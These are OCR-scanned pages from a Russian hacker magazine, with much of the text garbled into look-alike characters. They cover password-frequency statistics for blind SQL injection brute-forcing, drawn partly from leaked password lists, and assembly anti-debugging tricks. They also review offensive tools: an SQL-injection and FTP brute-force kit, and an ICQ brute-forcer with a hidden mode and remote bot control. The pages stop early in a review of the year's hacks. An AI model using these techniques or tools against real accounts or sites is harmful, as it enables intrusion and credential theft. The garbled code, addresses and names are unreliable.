пользоваться. Для проведения дальнейших 
статистических изысканий была загружена 
библиотека из 5575 книг на английском 
языке разных авторов, жанров и размеров. 
Библиотека была загружена отсюда: 
ѵѵѵѵѵѵ.диІепЬегд.огдЛіІез . Полный объем 
данных библиотеки составляет 2,15 
Гб, 1 761 ’822’605 английских букв или 
379’009’003 слов. Первый статистический 
результат интересно было получить для 
первой буквы в слове. Собрав соответствую- 
щую статистику по библиотеке, приходим к 
результатам, расходящимся с классическим 
частотником. По диаграмме на рисунке 
видно, что самая популярная буква для 
начала слова в английском языке — это «1», 
около 15% слов начинаются с нее. Прежде 
всего, это связано с обилием предлога «1Не» 
в английских текстах. Далее следует «а», 
которая в классическом частотнике занимает 
третье место. Но это все едино — значения 
практически совпадают. Интересно заметить 
другое: буква «е» — самая популярная среди 
всех букв — находится на 16-м месте по 
популярности первой буквы. Таким образом, 




при подборе первого символа, например, в 
имени пользователя, выгоднее расположить 
ее подальше в массиве. Обратный пример — 
«ѵѵ», которая находится на 5-м месте среди 
букв, с которых начинается слово, и только 
на 16-м среди всех букв в словах. Итак, с 
первым символом стало понятнее, поехали 
дальше. 

ФОНЕТИЧЕСКИЕ ЦЕПОЧКИ Учитывая тот 

факт, что языки обладают фонетикой, а фоне- 
тика завязана на слогах, была собрана ста- 
тистика двухбуквенных сочетаний — то есть 
расчет, с какой вероятностью текущая буква 
следует за предыдущей. Получается, что 
буквы как бы цепляются одна за другую, поэ- 
тому методику условно можно назвать «фоне- 
тическими цепочками». Для всей библиотеки 
были построены такие фонетические цепоч- 
ки. Полный результат анализа можно найти 
на диске. Число во втором столбце — это 
сколько раз буква была найдена следующей 
за указанной. 

В первом столбце — сама буква. 

Получается очень громоздко и не слишком 
полезно. Однако чтобы понять, насколько это 
действительно полезно, необходимо проверить 
метод фонетических цепочек на практике. В 
качестве тестового образца были взяты две 
доступные в интернете базы данных: пароли 
пользователей Ноітаіі (около 10000 штук] и 
логины пользователей Фгит.зеагсбепдіпез. 
ги (около 70000 штук]. Для каждой базы были 
построены аналогичные фонетические цепоч- 
ки, результаты сравнивались с цепочкой, 
полученной для книг. И результаты совпали 
по динамике. Приводить здесь все 26 диа- 
грамм бессмысленно, поэтому ограничимся 
только двумя для букв «а» и «в», которые вхо- 
дят в пятерку самых популярных первых букв 
логинов, паролей и книжных слов. Сходство 
статистики для паролей, логинов и слов из 
книг налицо. Видно также, что логины боль- 
ше статистически похожи на слова из книг, 
нежели пароли. Учитывая все придуманное 
и посчитанное выше, получаем новую, ста- 
тистически грамотную функцию для эксплуа- 
тации ОоиЫе ЫіпсІ 50І_ Іщесбоп (ищи ее на 
нашем БУО]. После статистического анализа 
слов английского языка, логинов и паролей в 
голову может прийти мысль о распределении 
символов в значениях хеш-функций. На самом 
деле, мысль абсурдная, поскольку все рас- 
пределения символов в хешах должны быть 
равномерны, на то они и хеши, собственно 
:]. Но для наглядности можно проверить это 
на примере списка логинов и хеширования 
тсІ5. Результаты на диаграмме, как видно, 
полностью подтверждают равномерное рас- 
пределение. 

ЗАКЛЮЧЕНИЕ Надеемся, материал был 
познавательным и интересным. Призываем 
искать и находить еще более красивые и 
быстрые методы эксплуатации инъекций. До 
новых встреч в журнале! ц-ц 
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Сколько раз начинающие реверсеры спотыкались о настоящ 
банальщину — не сосчитать. Набив шишки, многие набрались опыта, 
вз?ілисьза виртуализированный код и потеряли спортивный интерес 
к^нтиотладке. Наша стобой задача — попытаться взглянуть на 
і/звестные приемы антиотладки под новым углом. Когда уже нечего 
ольше искать, когда испробовано все — приходится копать вглубь, 
а не вширь, модифицируя существующие антиотладочные приемы 
самым неожиданным образом. 



КОГДАТРАССИРОВКА 

БЕССМЫСЛЕННА 

Отладчики прикладного уровня хороши тем, что 
сними можно вытворять все, что душе угодно. К 
примеру, можноуйти оттрассировки инструк- 
ции путем изменения регистра сегмента стека. 
Звучит неправдоподобно, однако это действи- 
тельно так. Рассмотрим конструкцию: 

АББКЕЗЗ : РБЗН 33 
АББКЕЗЗ+1: РОР 33 
АББКЕЗЗ+2 : МОѴ АХ, АХ 
АББКЕЗЗ+5: БОР 

Если, трассируя такой код в отладчике приклад- 
ного уровня, мы сделаем два шага, то... остано- 
вимся по адресуА00РЕ55+2? Нетут-то было! 
Инструкция, следующая за РОР 55, выполнится 
автоматически, после чего мы окажемся по 
адресу А00РЕ55+5. Каким образом это можно 
использовать для выполнения антиотладки? В 
принципе, выполнение одной-единственной 
инструкции ничего интересного недает. Может 
быть, ты надеешься на саіі, но я поспешутебя 
разочаровать: ксожалению, хотя инструкция 
вызова и выполнится, отладчик, скорее всего, 



установитточку останова на первую инструкцию 
вызываемой функции, и реверсерузритвсе 
защитные «потроха». Необходимо придумать 
что-то более изощренное. Я предлагаю взять 
любой известный антиотладочный прием (на- 
пример, чтение флага — выдает все отладчики 
прикладного уровня, на которые не навешаны 
специальные плагины] и «скрестить» его с ан- 
титрассировочным трюком так, чтобы инструк- 
ция «РОР 55» располагалась непосредственно 
перед условным переходом, который решает 
судьбу дальнейшего выполнения программы. 
Следующий код (он был прикручен к виндовому 
«Блокноту» при помощи ОКуОЬд] наглядно 
демонстрирует эту особенность: 



01008748 РБЗН 33 



; проверяем, имеется ли в наличии 



отладчик прикладного уровня 



01008749 
ЕЗ: [18] 
0100874Е 
БЗ: [ЕАХ+30] 
01008752 
БЗ: [ЕАХ+2 ] 
01008756 



МОѴ ЕАХ , БѴЮКБ РТЕ 
МОѴ ЕАХ , БѴЮКБ РТЕ 
МОѴ2Х ЕАХ , ВУТЕ РТЕ 
ТЕЗТ АЬ,АБ 



; выполняем модификацию регистра 33 
и "пролетаем" выполнение инструкции 
; по адресу 01008759, вследствие 
чего приложение завершает работу 
01008758 РОР 33 

01008759 БЫ 2 ЗНОЕТ 01008777 ; 

переходим "в пустоту" 

0100875В БМР 0100739В ; пере- 

ходим на точку входа побераб.ехе 

Разумеется, вместо банальной проверки флагов 
можно использовать другой, более неоднознач- 
ный код. Пошаговая трассировка вплоть до 
адреса 01008759 оканчивается неудачей. Раз- 
бавленная мусорным кодом, «фишка» способна 
заставить задуматься не слишком опытного 
реверсера. Методхорош тем, что универсален и 
может применяться для выполнения критичес- 
ки важныхзащитных инструкций. Возможно, 
бывалого реверс-инженера это не остановит. 

С другой стороны, несколько десятков пар 
инструкций «ризб зз/рор зз», равномерно раз- 
бросанных в недрахзащитного кода, заставят 
взломщика находиться в постоянном напря- 
жении. Сгодится использование приема и для 
сокрытия вызовов, ведущих «в никуда», если 
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Р9 Н Е СПАСАЕТ ОТ КРАХА, А ВОТ В 
ШТАТНОМ РЕЖИМЕ ПРОГРАММА 
РАБОТАЕТ ПРЕКРАСНО 






ВНУТРИ ИНСТРУКЦИИ ХОР ЗАТАИЛСЯ КОВАРНЫЙ моѵ 



защита пускает программу «лесом», обнаружив 
отладчик, б МР-ы, которыеуказываютна несу- 
ществующие адреса памяти, достаточно часто 
принимаются не самыми умными дизассемб- 
лерами отладочных средств за байты данных 
(в чем мы убедимся далее]. И именно поэтому 
можноукрыть переход при помощи рассмотрен- 
ного приема. Новичокбудет недоумевать: инс- 
трукция «Р0Р55», которая меняет ЕІР, убивая 
программу — нечто невообразимое! 

КРАДЕМ ТАЙМЕР 
ИЗКЕКЫЕІ.32.0Ц. 

Всем, наверное, известен старый антиотла- 
дочный прием, основанный на использовании 
АРІ-функции ОеТТіскСои пТ, которая входит в 
библиотеку кегпе132. сіи. Выглядитон прибли- 
зительно, как представлено ниже: 

саіі СеЕТіскСоипБ 
хсЬд еЬх , еах 
саіі СеЕТіскСоипБ 
зиЪ еах, еЬх 



сіи и посмотрим на код ОеШскСоипЕ 

7С80934А > ВА 0000ЕЕ7Е 
МОѴ ЕВХ, 7РРЕ0000 
7С80934Р 8В02 

МОѴ ЕАХ , ВТлЮЕВ РТЕ БЗ : [ЕБХ] 
7С8093 51 Е762 04 

МББ БШЕБ РТК БЗ: [ЕБХ+4] 

7С8093 54 0РАСБ0 18 

ЗНКБ ЕАХ, ЕБХ, 18 
7С8093 58 СЗ ЕЕТБ 

Если вызов функции ОеГГіскСоипІ: фигурирует в 
коде, сразу становится ясно: используется тай- 




ВЫПОЛНЕНИЕ ИНСТРУКЦИИ РОР 
55 ОТПРАВИТ ПРОГРАММУ В АД! 



01008758 БЫВ 02000000; перехо- 

дим к заведомо недоступному адресу 
0100875Е БМР 0100739В 

; перенесенная функция СеЕТіскСоипБ : 



0100876Р 
01008774 
БЗ: [ЕБХ] 



МОѴ ЕБХ , 7РЕЕ0000 
МОѴ ЕАХ , ВѴГОЕВ РТЕ 



КОД ПОДСЧИТЫВАЕТ ВРЕМЯ ВЫПОЛНЕНИЯ ОДНОЙ 
ИНСТРУКЦИИ И, ЕСЛИ ОНО ПРЕВЫШАЕТ ЗАДАННОЕ 
ЗНАЧЕНИЕ. ПРОЦЕСС ЗАВЕРШАЕТСЯ. 



стр еах, 1 
бпЪ сІеЪиддесІ 

сІеЬиддесІ: саіі ЕхіЕРгосезз 

М50Ы описывает функцию так: «ТЬе геіигп 
ѵаІиеІ5І;ЬепитЬего1 : тіШзесопбз Ила! Ьаѵе 
еіарзесі зіпсе іЬе зузіет ѵѵаз зіагіеб». Сле- 
довательно, приведенный код подсчиты- 
вает время выполнения одной инструкции 
и, если оно превышает заданное значение 
(миллисекунду], процесс завершается, 
поскольку программа выполняется под 
отладчиком. Новое — это хорошо забытое 
старое. Мы можем попробовать разнооб- 
разить жизнь реверсера, немного изменив 
принцип действия этого приема. Откроем 
под отладчиком ОИ-библиотеку Кегпе132. 



мер. Это вызываетсправедливые подозрения в 
антиотладке. Чтобы запутать реверсера, часто 
используется методика переноса кода АРІ-фун- 
кций втело программы. Ей мы и воспользуем- 
ся. Попробуем перенести рассмотренную нами 
функцию в конец секции кода «Блокнота», по 
адресу 0100876Е (адрес можетбытьлюбым — 
секция выравнивания, оставленная компиля- 
тором, достаточно велика], после чего напишем 
антиотладочный код: 

01008748 САББ 0100876Е; вызы- 

ваем "наш" СеБТіскСоипБ 
0100874Б ХСНС ЕАХ , ЕВХ 

0100874Е САББ 0100876Е; снова 

вызываем "наш" СеБТіскСоипБ 
01008753 ЗБВ ЕАХ , ЕВХ 

01008755 СМР ЕАХ , 1 



01008776 МЕТЕ ВѴГОКВ РТЕ 

БЗ: [ЕБХ+4] 

01008779 ЗНЕБ ЕАХ , ЕБХ , 1 8 

0100877Б ЕЕ ТБ 

Послетого, как код написан и занесен в РЕ- 
файл, остается лишь поменять точку входа 
файла в БогбРЕ, заменив ее на 01008748. Файл, 
обработанный таким образом, отказывается 
работать под отладчиком. Результат анализа 
щЬ-а, располагающегося по адресу 01 008758, 



выглядиттак: 








01008758 


0Е 


БВ 


0Е 


01008759 


83 


БВ 


83 


0100875А 


А2 


БВ 


А2 


0100875В 


78 


БВ 


7 8 ; СНАЕ 



1 х 1 
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УДИВИТЕЛЬНО, С КАКОЙ ПЕДАН- 
ТИЧНОСТЬЮ іммиштѵ копирует 
0Ц.Ѵ0В6 — ДАЖЕ ИХ ДИЗАССЕМ- 
БЛЕРЫ СПОТЫКАЮТСЯ ОБ ОДНИ И 
ТЕЖЕ КАМНИ 



0100875С . РРОО 

ШС БШЕБ РТК БЗ: [ЕАХ] 

Это — следствие то го, что операндусловного пе- 
рехода указывает на недоступный адрес памяти. 
Дизассемблер отладчика ОНуЭЬд полагает, что 
такого не может случиться даже теоретически, и 
превращает инструкцию в набор данных. 

В ПРЯТКИ С ДИЗАССЕМБЛЕ- 
РОМ, ИЛИ УПАКОВЫВАЕМ 
МОѴ В ХОК 

Поговорим о еще одном способеусложнить 
жизнь реверсера. Выше было сказано, что ус- 
ложнить работу реверсера можно путем переноса 
узнаваемых АРІ-функций (вроде ОеТТіскСоипІ;) 
в тело защищаемой программы. Попробуем 
создать «странный» код, который, на первый 
взгляд, кажется бессмысленным, но выполняет 
вполне осязаемые антиотладочные действия. 
Ситуацию рассмотрим туже, что и в преды- 
дущем случае — перенесение АРІ-функции 
ОеіТіскСоипІ: поадресу0100876Р. Представь, 
что реверсер достаточно опытен и знает все 
типовые АРІ-функции вроде ОеТТіскСоипІ;, 
которые используются в простейших антиот- 
ладочных приемах, «в лицо». Можно ли моди- 



фицировать перенесенный код так, чтобы он 
ничем себя не выдавал? Как вариант, — 
разбавить его инструкциями вроде «тоѵ 
ах, ах». Будет ли это для реверс-инженера 
трудной задачей? Врядли. Более предпоч- 
тительна замена прямых адресов, использу- 
емых в коде, на подсчитываемые значения, 
однако есть другое элегантное решение, 
которое заставит вскипеть мозги реверсера. 
Какты, вероятно, заметил, инструкция, распо- 
лагающаяся по адресу 01008774, выглядит 
следующим образом: 

01008774 8В02 

МОѴ ЕАХ , БѴЮКБ РТК БЗ : [ЕБХ] 

Опкод инструкции — 0х8Ь02. Что произойдет, 
если спрятать одну инструкцию внутри другой? 
Наглядный пример: опкод 0х358В029090 имеет 
инструкция ХОР ЕАХ, 9090028В. Таким образом, 
если расположить эту инструкцию по некоторо- 
му адресу А00ПЕ55, после чего передать при 
помощи безусловного перехода управление на 
адрес (АБ Б РЕ55+1 ) , то выполнится совсем не 
ХОР, а набор инструкций: 

АББКЕЗЗ : БВ 35 

АВВКЕЗЗ+1 : МОѴ ЕАХ, БѴЮКБ РТК БЗ : [ЕБХ] 
АББКЕЗЗ + З : ЮР 
АББКЕЗЗ + 4 : ЮР 

Поскольку первый байт отброшен, инструкция 
не воспринимается процессором какХОР, 
а последние 2 байта последовательности 
(0x9090) будут интерпретироваться как ЫОР-ы! 
Вот как реализовать это на практике для изме- 
нения кода перенесенной нами АРІ-функции 
ОеіТіскСоипЕ 

0100876Р ВА 0000РЕ7Р 
МОѴ ЕБХ, 7РРЕ0000 
;при помощи следующего Бтр-а мы 
"проскакиваем" мимо фейкового ХОК-а. 

01008774 ЕВ 07 



БМР ЗНОКТ 0100877Б 
; следующая инструкция — ХОК — не 
будет выполнена никогда ! 

01008776 35 8В029090 

ХОК ЕАХ, 9090028В 
0100877В ЕВ 04 

БМР ЗНОКТ 01008781; переходим 
к дальнейшим действиям 



; инструкция, расположенная ниже, 
ведет вовсе не к ХОК-у,а на байт 
"ниже" — к инструкции МОѴ! 

0100877В ЕВ Р8 

БМР ЗНОКТ 01008777 

; следующей инструкцией мы заставля- 
ем отладчик думать, что ХОК все-таки 
используется 
0100877Р 74 Р5 

БЕ ЗНОКТ 01008776 
01008781 Р762 04 

МББ ВШКВ РТК БЗ: [ЕВХ+4] 
01008784 0РАСБ0 18 

ЗНКБ ЕАХ, ЕБХ, 18 
01008788 СЗ 
КЕТБ 

Код нуждается в дополнительных коммента- 
риях. Поскольку встроенные дизассемблеры 
отладчиков прикладного уровня наподобие 
ОНуБЬд анализируюттеоретическую возмож- 
ность выполнения определенных инструкций, 
они могут интерпретировать набор байтов, 
расположенных по некоторому адресу, либо 
какданные, либо как код. Если бы приведен- 
ный код не содержал инструкцию ЗЕ5Н0РТ 
01008776, дизассемблер принял бы решение, 
что инструкции ХОК ЕАХ, 9090028В просто не 
существует, и выдал бы реверсеру всю подно- 
готную нашего кода. Ксчастью, мы точно знаем, 
что в контексте данного куска кода инструкция 
ОЕ5НОВТ 01008776 не передаст управление по 
адресу 01 008776. Результат подобного «шама- 
низма» —достаточно запутанный антиотладоч- 
ный код, который, тем не менее, работает! ~і~ 
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ПРОГРАММА: Т00І.2А 1.0 
ОС: *ЫІХ/ѴѴІЫ 
АВТОР: РА5НКЕІ.А 

Нечасто в наших обзорах можно видеть насто- 
ящиехакерские комбайны. Перловый скрипт 
ТооЕа 1 .0 отучастника Античата Пашкелы как 
раз относится ктаким программам. Прога воб- 
рала в себя все основные функции, без которых 
современный хакер просто не может обойтись: 
работа со скуль-инъекциями, сканер файлов и 
папоксайта, работа с Ііі/чтением файлов через 
функции рбр/чтением файлов через ІоасНіІе, Ир 
чекер/брутер, ргоху чекер/граббер. 

Все эти вкусности обладают следующими 
свойствами: 

• Выбор Р05Т или СЕТ; 

• Поддержка прокси; 

• Выбортаймаута соединения; 

• Возможность вставить соокіез; 

• Возможность изменить юзерагента; 

• Возможность изменить реферер; 

• Возможность выбора НТТР-протокола. 

Теперь более подробно о функционале проги. 

1. Режим работы с Му5цІ=>5: 

• поддержка И N Н ЕХ(Н ЕХ(ЗОи) ; 

• поддержка АЕ5_Р ЕС РУРТ(АЕ5_ 
ЕІ\ІСРѴРТ(5СІІ_,ае5_кеу) р ае5_кеу); 

• выбор пробелов (+,/**/,%20 ит.д.]; 

• выбор лимитов (по ІітМі; ІітіІ+0,1 ; ІітіІ+1 ,1); 

• выбор комментариев; 

• выбор паузы между пачкой запросов; 

• возможность выбора дампа данных из выбран- 
нойтаблицы; 

• возможность вставить свое условие при дампе 
данных изтаблицы; 

• автопроверка на Т1е_ргіѵ. 

2. Режим Му5ц14 ЬгіПеп 

• возможность добавлять префикс для таблиц и 
префиксдля колонок; 

• словарь таблиц — 3434 наименования; 

• словарь колонок — 760 наименований. 

3. Режим 5Те зсаппег іог боісіегз & біез: 

• словарь из 3455 позиций; 

• возможность редактирования ошибок при от- 
вете сайта на запрос при несуществующем ПРИ; 

• возможность пополнения словаря. 

4. Режим ІРІ/ПЕАОЕП/І_оасПіІе() ЬгіТег: 

• 6 режимов работы. 

[1] БРІ/КеасІег — ѵізиаі еггог ѵтЬеп 
ѵтгопд диегу 

[2] ЬРІ/Кеасіег — ипѵізиаі еггог ѵЩіеп 
ѵтгопд диегу 

[3] Музді 1оасі_Іі1е — ѵізиаі еггог 
ѵ/Ьеп шгопд диегу, тадіс_диоЬез=0РР 

[4] Музді 1оасі_Іі1е — ипѵізиаі еггог 
ѵіЬеп шгопд диегу, тадіс_диоЬез=0РР 



[5] Музді 1оасі_Іі1е — ѵізиаі еггог 
хУЬеп шгопд диегу, тадіс_диоЬез=СЖ 

[6] Музді 1оасі_Іі1е — ипѵізиаі еггог 
ѵЩіеп шгопд диегу, тадіс_диоЬез=(Ж 

5. Режим ВІіпсІ МузцІѵ.4-5 іщесбоп: 

• брутдля ВІіпсІ Му5ц14 таблиц и колонокс воз- 
можностью добавления своего префикса; 

• 4 режима брута. 

[1] РГогтаІ МОБЕ брута (диапазон 
0-255) — неограниченное количество 
записей, универсальный, вывод оши- 
бок необязателен 

[2] Разб МОБЕ брута — (диапазон 
0-255) — количество записей <= 10, 
универсальный, вывод ошибок необя- 
зателен 

[3] ТБКВО-МОБР брута в режиме дам- 
па "1 запись 1 колонка" (диапазон 
0-255) — универсальный, выводоши- 
бок необязателен 

[4] МБ 5 -ТБКВО-МОБР брута в режиме 
дампа "1 запись 1 колонка" (диапазон 
48-102) — универсальный, выводоши- 
бок необязателен 

6 . Режим Му5цІ іщ Ьгиіег количества колонок: 

• метод ипіоп+зеіесі;; 

• возможность менять максимальное количест- 
во КОЛОНОК; 

• определение правильности запроса по 
наличию или отсутствию уникального текста на 
странице; 

• автоопределение Іітіі (безлимита, Іітіі+0, 1 , 
Іітіі+1 ,1); 

• определение принтабельной колонки. 

7. Режим РТР сбескег: 

• сохранение проверенных Ир в файл (2 фор- 
мата); 

• если порт не указан, выставляется дефолтный; 

• возможны пробелы между строками (автооп- 
ределение); 

• возможны любые символы в начале и в конце 
строки (автоопределение). 

8 . Режим РТР ЬпКег: 

• 3 режима работы: 

[1] Брут Іодіп : раззжэгб (любой 
беіішібег, задается в настройках, по 
умолчанию " : " ) 

[2] Известен логин, брут паролей 

[3] Известен пароль, брут логинов 

9. Режим РРОХУ сбескег: 

• сохранение валидных проксей в файл. 

10. Режим РРОХУ дгаЬЬег: 




Тооііа 1.0 в деле 



• 1 6 актуальных сайтов с проксями; 

• возможность граббинга проксей через 
Р05ТІ ѲЕТІсоокіе и даже через ргоху; 

• возможность добавления своих сайтов для 
граббинга; 

• Маска простейшая, на абсолютную коррект- 
ность не проверяется (на то есть таймаут и ваш 
АІ): 

Еслиутебя появились идеи поулучшениютулзы, 
смело можешь оставлять их автору на его фо- 
ру м е : ітКді//ЬщЩі^сісдѴз^ 

Также в этом топике выложены и видео-туториа- 
лы по работе со скриптом. 

П РО ГРАМ МА: ѴКВОТ (РРЕ 0.9.2) 

ОС : ѴѴІЫРІѴѴ5 95/98/МЕ/2000/2003/ 
ХР/ѴІ5ТА/7 

АВТОР: АЛЕКСЕЙ І_Е][ СКЕЛОВ 

Если ты пользуешься Известной Соци- 
альной Сетью (как простой участник или 
как, хм, рекламщик), то, наверняка, тебе 
хотелось бы расширить и углубить свои 
познания о ее функционале. И использо- 
вать фишки вроде самообновляющегося 
статуса и «вечного онлайна», одним кликом 
чистить сообщения и вступать во множест- 
во групп, рассылать приглашения о вступ- 
лении в дружбу сразу множеству человек 
и т.д. Специально для этих целей и была 
придумана прога ѴкВоЕ 
Функционал тулзы поражает, смотри сам: 

1. Всплывающие уведомления при получении 
новых личных сообщений. 

2. Профиль: 

• Изменениеуниверситета на произвольный; 

• Произвольная дата (любая, минусовая) + дру- 
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гие пустые поля в «основной информации»; 

• Удаление (чистка): входящих/исходящих 
сообщений, стены, истории статусов; 

• Добавление пользователя в блек-лист; 

• Массовое вступление в группы; 

• Удаление всех групп; 

• Отклонение всех приглашений в группы; 

• «Профиль» «Информация» «+50 случай- 
ных человек в друзья»— высылаетзаявки на 
вступление в друзья случайным 50 людям. 

3. Отметки: 

• Отметить всех друзей на Фото; 

• Отметить всех друзей на Видео. 

4. Медиа: 

• Загрузка Картинки как Граффити; 

• Загрузка «Мульти картинки»; 

•Загрузка «Фейк-картинки»; 

•«Умное» скачивание Музыки (Клавиши СМ и 
5ЫК: позволяют осуществлять массовый выбор 
песен); 

• «Умное» скачивание Видео; 

• «Умное»скачивание Альбома; 

• Массовая загрузка: всех картинокиз выбран- 
ной папки и всех песен из выбранной папки. 

5. Автоматизация: 

• Автоматическое Одобрение/Удаление отметок 
на Фото; 

• Автоматическое Одобрение/Удаление отметок 
на Видео; 

• АвтоматическоеУдаление приглашений на 
Приложения; 

•Автоматическое Принятие/Удаление запросов 
в друзья; 

• «Вечный» Онлайн; 

• Автообновляющийся статус. Доступные тэги: 
{аптайм} — время работы компьютера, {плеер} — 
выводит название запущенного плеера, {играет} 

— выводитназвание песни\фильма, которые 
воспроизводятся (поддерживаемые плееры: 
ѴѴіпатр, АІМР2, ОМ Р (ОСО), ЗеІАисІіо, КМРІауег, 
Месііа РІауегСІаззіс (МРС), 60МР1ауег+ все, 
которые написаны на основе винампа). 

6. Администрирование группы: 

• Бан пользователя; 

• «Группа» «+40 случайных пользователей» 

— высылает приглашения 40 случайным пользо- 
вателям; 

Также в прогу встроена оченьудобная поддер- 
жка горячих клавиш. 

Работа с текстом: 



аіб + і — показывает перевод выде- 
ленного текста с английского языка 
на русский + сохраняет полученный 
результат в буфер обмена 
а1б + 2 — показывает перевод выде- 
ленного текста с русского языка на 
английский + сохраняет полученный 
результат в буфер обмена 
а1б + 3 — конвертирует выделенный 
текст в другую раскладку 
а1б + 4 — конвертирует выделенный 
текст в «подчеркнутый» текст 
а1б + 5 — конвертирует выделенный 
текст в «зачеркнутый» 
аіб + б — делает выделенный текст «в 
рамке» 

а1б + 0 — конвертирует выделенный 
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Работа ѴкВоГа 



Асечный брутфорс 



текст (кроме кирилицы) в А8СІІ коди- 
ровку, т.е. "д" = "q м ит.д. 



Другие горячие клавиши: 



сбг1 + зЬ.ібб+левая_мышка — позволяет 
чертить линии в Граффити (зажимаем 
шифт, ставим первую точку, перемеща- 
ем указатель в нужное место, ставим 
вторую точку — автоматически прово- 
дится линия между точками) 
сбгі+аіб+і — показывает название 
воспроизводимой песни/фильма в 
всплывающем сообщении 
сбг1+а1б+2 — «печатает» название 
воспроизводимой песни/фильма в вы- 
бранном окне 



Так как программа очень часто обновляется, 
советую следить за ее историей изменений на 
официальном сайте Шр://ѵкЬобги . 

Р.5. В бетатестинге находится версия ѴкВоГа 
для никсов. Ждем-с. 



ПРОГРАММА: АІ.РАВКІЛЕ3123 
ОС: ѴѴІЫ0ІѴѴ5 95/98/М Е/2000/2003/ 
ХР/ѴІ5ТА/7 
АВТОР: ЛУКА 

Представляю твоему вниманию уникальный в 
своем роде асечный брутфорсер — АІіаВпФе. 
Егоуникальностьзаключается втом, что при 
своей нелегкой работе он совершенно нетребу- 
етпроксей! При этом сохраняются все возмож- 
ности остальных брутфорсеров, вроде высокой 
скорости работы и защиты от бана при переборе 
номеров. 

Возможности программы ни в чем неуступают 
возможностям своих старших собратьев: 

• брутразныхдиапазонов; 

• возможность собственноручного редактирова- 
ния списков серверов; 

• возможность выбора времени перехода между 
серверами (Тітеоиі); 

• сохранениетекущей сессии; 

• все номера записываются в файлы дооб.М и 
ЬасІ.М; 

• в любое время можно изменить введенные ра- 
нее данные (диапазон, пароль, время и список 
серверов); 



• автоматическое продолжение работы при 
загрузке программы; 

• отправка отчета на Е-таіІ или номер ІСО; 

• брут по списку иіп;раз5; 

• минимизация программы при запуске; 

• переподключение бота при разрыве соеди- 
нения; 



• программу не видно в процессах (режим Нісіе] 
и в списке приложений; 

• пароль для защиты программы от посторонних 
глаз; 

• автосохранение через заданное время; 

• полное удаленное администрирование пос- 
редством бота. 

Бот для удаленного администрирования брута 
понимает следующие команды: 



! А — список команд 
! збаб — статистика 
! баба — данные брута 
! абб_<иіп1>_<иіп2>_<разз>_<біте- 
оиб> — добавить запись 
!бе1<номер строки> — удалить запись 
! збор — остановить брут 
! збагб — запустить брут 
! зебб — настройки 
! герогб — настройка е-шаіі бота 
Ігеробб — выключить отправку отчета 
по е-шаіі 

! гер_<е-таі1> — включить передачу 
отчета на указанный е-шаіі 
! гшт — настройка запуска брута 
! гшшіп — вкл/откл запуск вместе с 
Міпбоілз 

! гшізбагб — вкл/откл автоматическое 
продолжение работы 
! гипшіп — вкл/откл минимизацию при 
старте 

Погибе — настройка процесса работы 
! зЬаб — вкл/откл сохранение Ьаб.бхб 
! здооб — вкл/откл сохранение дооб. 
бхб 

Ісіодз — вкл/откл заполнение логов 
'беігом — вкл/откл удаление строки в 
файле зоигсе.бхб 
Ізаѵеобб — откл. автосохранение 
! заѵе_<біте> — вкл. автосохранение 
через указанное время 
! зае — настройка выхода из программы 
! зе_<пашЬег> — режим выхода: 1 — с 
запросом; 2 — не сохранять; 3 — всег- 
да сохранять 
'тоге — другие настройки 
! бор — вкл/откл режим «поверх всех 
окон» 

Шібеобб — отключить скрытый режим 
!Аібе_<разз> — включить скрытый ре- 
жим с указанным защитным кодом 
! ехіб — выйти 



Для более полного ознакомления с функциона- 
лом проги советую посетить официальный сайтее 

а вто ра — ЬАрУ/ііѵказоА.ЗсІп.ги/ІоасІ/І -1 -0-1 5 . т 
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ІМАРИЯ «МІРКІЫ-» НЕФЕДОВА МІРКІШВКЕАІ..ХАКЕР.КЦ Д 





Самые 
громкие дела 
уходящего года 



ЗА ГОД УСПЕВАЕТ ПРОИЗОЙТИ МНОГОЕ: ИЗОБРЕТАЮТ И ВЫПУСКАЮТ 
НОВЫЕ ГАДЖЕТЫ. ОТКРЫВАЮТ НОВЫЕ ТЕХНОЛОГИИ, ДЕЛАЯ 
БУДУЩЕЕ ЧУТОЧКУ БЛИЖЕ. ПРИНИМАЮТ НОВЫЕ ЗАКОНЫ ИЛИ. 
НАОБОРОТ. ПРОТЕСТУЮТ ПРОТИВ ИХ ПРИНЯТИЯ. МИРОВАЯ СЦЕНА. 
КОНЕЧНО, ТОЖЕ НЕ СТОИТ НА МЕСТЕ - КТО-ТО КОГО-ТО ЛОМАЕТ, 
КОГО-ТО АРЕСТОВЫВАЮТ И СУДЯТ. А КТО-ТО, ТЕМ ВРЕМЕНЕМ. 
ПЕРЕКВАЛИФИЦИРУЕТСЯ В ѴѴНІТЕ НАТ'А И ПОЛУЧАЕТ ПОСТ В КРУПНОЙ 
КОМПАНИИ. ВОТ О ПОСЛЕДНЕМ-ТО МЫ СЕГОДНЯ И ПОГОВОРИМ. НЕТ, 
НЕ О ДОЛЖНОСТЯХ И КОМПАНИЯХ. А ХАКАХ, СУДАХ И СКАНДАЛАХ - О 
САМЫХ ЗАМЕТНЫХ ПРОИСШЕСТВИЯХУХОДЯЩЕГО ГОДА. 



ВЗЛОМЫ 

Хотя интернете годами растет, развивается и 
даже взрослеет, хакеров в Сети не становится 
меньше. На сменулегендам приходятновые 
герои, и это далеко нетолько скрипткиддисы и 
«школота», использующая чужие утилиты в своих 
крамольных целях. 

Такчто, взломов не становится меньше, напротив — 
пропорционально росту интернета растет коли- 
чество и изощренность компьютерныххулиганов. 
Наших бравых бойцов клавиатуры и кода не ос- 
танавливает и то, что с годами власти стран мира 
становятся все ум нее и пости га юттрудную науку 
борьбы с киберпреступниками все лучше. 

Итак, два гуру компьютерного мира, чьи имена 
известны каждому— Кевин Митники Ден Камин- 
ски. Первый — легендарный хакер, которыйте- 
перь предпочитает политкорректно именоваться 
«секьюрити специалистом». Он отсидел за свои 
преступления втюрьме, написал ряд книг, о нем 
сняли фильм и слегкой руки СМИ Митника теперь 
называют чуть л и не отцом-основателем хакерс- 
тва (что, конечно, не совсем верно). Второй — 
тоже специалист в области ИБ, известный, на- 
пример, тем, что нашел немало дырокв 0Ы5. Что 
их объединяет? Многое, нотеперьеще и то, что 
оба стали жертвами хакеров :). 

Пока в июле-августе 2009 Митники Камински 



отвисали на конференциях Віаск НаІ и ОеГСоп, 
ребята из команды ХегоІогОѵѵпесІака 2Р0 
решили подмочить репутацию «белым шапкам» 
и нанеслиудар. Митники Камински, конечно, 
были выбраны в качестве мишеней неслучайно, 
причиной послужил именно статус всемирно 
известных экспертов. 

Больше досталось Дену Камински, который не 
только держал в сети частный ресурс, но и хранил 
наудаленной машине кучуличных файлов. Кроме 
того, Камински совершенно не волновался о сво- 
